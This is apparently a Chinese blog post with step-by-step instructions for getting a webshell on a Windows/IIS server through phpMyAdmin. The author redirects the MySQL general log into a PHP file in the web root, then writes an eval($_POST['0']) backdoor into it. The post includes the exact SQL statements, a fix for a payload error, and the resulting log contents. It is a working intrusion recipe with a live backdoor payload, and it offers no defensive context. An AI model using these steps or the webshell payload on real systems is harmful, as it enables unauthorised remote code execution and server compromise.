phpmyadmin通过日志拿shell

环境:win2003 、IIS6、PHP、asp、cgi-fcgi

1、set global general_log='on' 
2、set global general_log_file='c:\\phpstudy\\www\\log.php'   #一定使用 '\\'
3、select "<?php eval($_POST[0])?>"

出现时不时错误:

HTTP/1.1 500 Server Error
Date: Tue, 23 Jan 2018 01:38:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 105
PHP Notice:  Use of undefined constant (常量)shell - assumed 'shell' in C:\phpStudy4IIS\WWW\log.php on line 64

原因:[0]中0是常量,['0']中0是变量,所以应该是:<?php eval($_POST['0'])?>

log.php文件内容:
MySQLa, Version: 5.5.40 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
           96 Quit  
180123 10:20:47    97 Connect   root@localhost on 
           97 Query SET CHARACTER SET 'utf8'
           97 Query SET collation_connection = 'utf8_general_ci'
180123 10:20:48    97 Query SELECT "<?php eval($_POST['0'])?>"
           97 Init DB   mysql
           97 Query SHOW MASTER LOGS
           97 Quit  ......
                                ......
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • php.ini设置,上传大文件: post_max_size = 128Mupload_max_filesize ...
    bycall阅读 6,822评论 3 64
  • 把当前目录作为Root Document只需要这条命令即可:php -S localhost:3300 也可以指定...
    绚烂的时光阅读 742评论 0 1
  • 最早的Web服务器简单地响应浏览器发来的HTTP请求,并将存储在服务器上的HTML文件返回给浏览器,也就是静态ht...
    呵呵哒1991阅读 924评论 0 2
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,867评论 0 9
  • 从郭沫若的小文里感受到的泰山日出是壮丽热烈的,而这次自己站在观景台看到的,又是一种模样。 凌晨四点闹钟响起,从模糊...
    yanzikuaile燕子阅读 885评论 2 3